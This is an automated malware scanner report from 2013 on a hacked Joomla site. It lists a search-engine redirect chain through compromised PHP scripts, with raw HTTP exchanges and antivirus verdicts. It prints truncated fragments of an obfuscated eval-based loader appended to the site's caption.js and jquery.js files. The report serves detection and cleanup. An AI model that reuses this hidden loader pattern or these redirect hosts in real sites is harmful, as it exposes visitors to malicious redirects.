Malware Scanner report for emergency-energy.ru

Malicious/Suspicious/Total URLs checked: 2/0/15
2 pages have malicious code. See details below.
Blacklists: OK
Malicious redirects: Found
The website redirects visitors from search engines to a third-party URL. The chain of malicious redirects found:
->http://tinyurl.com/c2td3xs
178 websites infected.
->http://gaviatravel.com/includes/phpinputfilter/www/0.php
763 websites infected.
->http://www.arcom-ivi.de/includes/domit/1.php
517 websites infected.

The website "emergency-energy.ru" is most probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious/Hidden/Total iFrames: 0/0/0
Deface / Content modification: OK

Malicious/Suspicious Redirects

Request / Server response / Status
URL: http://emergency-energy.ru/
(imitation of visitor from search engine)


GET / HTTP/1.1
Host: emergency-energy.ru
Referer: http://www.google.com/search?q=redirect+check1
HTTP/1.1 302 Found
Connection: close
Date: Mon, 04 Nov 2013 15:23:13 GMT
Location: http://tinyurl.com/c2td3xs
Server: nginx/1.4.1
Content-Length: 0
Content-Type: text/html; charset=utf-8
X-Powered-By: PHP/5.2.17
malicious
URL: http://tinyurl.com/c2td3xs
(imitation of visitor from search engine)


GET /c2td3xs HTTP/1.1
Host: tinyurl.com
Referer: http://www.google.com/search?q=redirect+check2
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 04 Nov 2013 15:23:13 GMT
Location: http://gaviatravel.com/includes/phpInputFilter/www/0.php
Server: TinyURL/1.6
Content-Length: 0
Content-Type: text/html
Set-Cookie: tinyUUID=277bbe673ba34e9e0be2ddda; expires=Tue, 04-Nov-2014 15:23:13 GMT; path=/; domain=.tinyurl.com
X-Powered-By: PHP/5.4.19
X-Tiny: cache 0.0022289752960205
malicious
URL: http://gaviatravel.com/includes/phpInputFilter/www/0.php
(imitation of visitor from search engine)


GET /includes/phpInputFilter/www/0.php HTTP/1.1
Host: gaviatravel.com
Referer: http://www.google.com/search?q=redirect+check3
HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Mon, 04 Nov 2013 15:23:13 GMT
Location: http://www.arcom-ivi.de/includes/domit/1.php
Server: Apache/2.2.3 (Red Hat)
Content-Length: 0
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.3.27
malicious

Scanned pages/files

Request / Server response / Status
http://emergency-energy.ru/
200 OK
Content-Length: 9415
Content-Type: text/html
clean
http://emergency-energy.ru/media/system/js/caption.js
200 OK
Content-Length: 11715
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var JCaption = new Class({
initialize: function(selector)
{
this.selector = selector;
var images = $$(selector);
images.each(function(image){ this.createCaption(image); }, this);
},
createCaption: function(element)
{
var caption = document.createTextNode(element.title);
var container = document.createElement("div");
var text = document.createElement("p");
var width = element.getAttribute("width");
var align =
... 10223 bytes are skipped ...
](i++));h4=I11lOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function I11(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(lI1(I11(OOO)));

Antivirus reports:

K7AntiVirus
Riskware
Comodo
TrojWare.JS.Agent.TC
F-Prot
JS/IFrame.SJ.gen
Norman
ShellCode.V
Commtouch
JS/IFrame.SJ.gen

http://emergency-energy.ru/templates/alternator/js/jquery.js
200 OK
Content-Length: 67006
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

(function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.clean([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]){return o().find(E)}var F=o(I||[]);F.context=document
... 65890 bytes are skipped ...
](i++));h4=I11lOI[_0x84de[3]](data[_0x84de[2]](i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String[_0x84de[4]](o1);} else {if(h4==64){enc+=String[_0x84de[4]](o1,o2);} else {enc+=String[_0x84de[4]](o1,o2,o3);} ;} ;} while(i<data[_0x84de[5]]);;return enc;} ;function I11(string){var ret=_0x84de[1],i=0;for(i=string[_0x84de[5]]-1;i>=0;i--){ret+=string[_0x84de[2]](i);} ;return ret;} ;eval(lI1(I11(OOO)));

Antivirus reports:

Ikarus
Trojan.Script
Comodo
TrojWare.JS.Agent.TC
Sophos
Troj/JSRedir-JN

http://emergency-energy.ru/templates/alternator/js/curvycorners.js
200 OK
Content-Length: 39852
Content-Type: application/x-javascript
clean
http://emergency-energy.ru/index.php?option=com_content&view=article&id=3&Itemid=3
200 OK
Content-Length: 9631
Content-Type: text/html
clean
http://emergency-energy.ru/index.php?option=com_content&view=article&id=4&Itemid=4
200 OK
Content-Length: 8403
Content-Type: text/html
clean
http://emergency-energy.ru/index.php?option=com_content&view=article&id=5&Itemid=5
200 OK
Content-Length: 8419
Content-Type: text/html
clean
http://emergency-energy.ru/index.php?option=com_content&view=article&id=6&Itemid=6
200 OK
Content-Length: 8455
Content-Type: text/html
clean
http://emergency-energy.ru/index.php?option=com_content&view=article&id=7&Itemid=7
200 OK
Content-Length: 8391
Content-Type: text/html
clean
http://emergency-energy.ru/index.php?option=com_content&view=article&id=8&Itemid=8
200 OK
Content-Length: 8531
Content-Type: text/html
clean
http://emergency-energy.ru/index.php?option=com_content&view=article&id=9&Itemid=9
200 OK
Content-Length: 8550
Content-Type: text/html
clean
http://emergency-energy.ru/index.php?option=com_scatalog&view=category&Itemid=10
200 OK
Content-Length: 11244
Content-Type: text/html
clean
http://emergency-energy.ru/index.php?option=com_scatalog&view=category&Itemid=11
200 OK
Content-Length: 10401
Content-Type: text/html
clean
http://emergency-energy.ru/index.php?option=com_scatalog&view=category&Itemid=12
200 OK
Content-Length: 10529
Content-Type: text/html
clean
http://emergency-energy.ru/index.php?option=com_scatalog&view=category&Itemid=13
200 OK
Content-Length: 10424
Content-Type: text/html
clean

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=emergency-energy.ru

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://emergency-energy.ru/

Result: emergency-energy.ru is not infected or malware details are not published yet.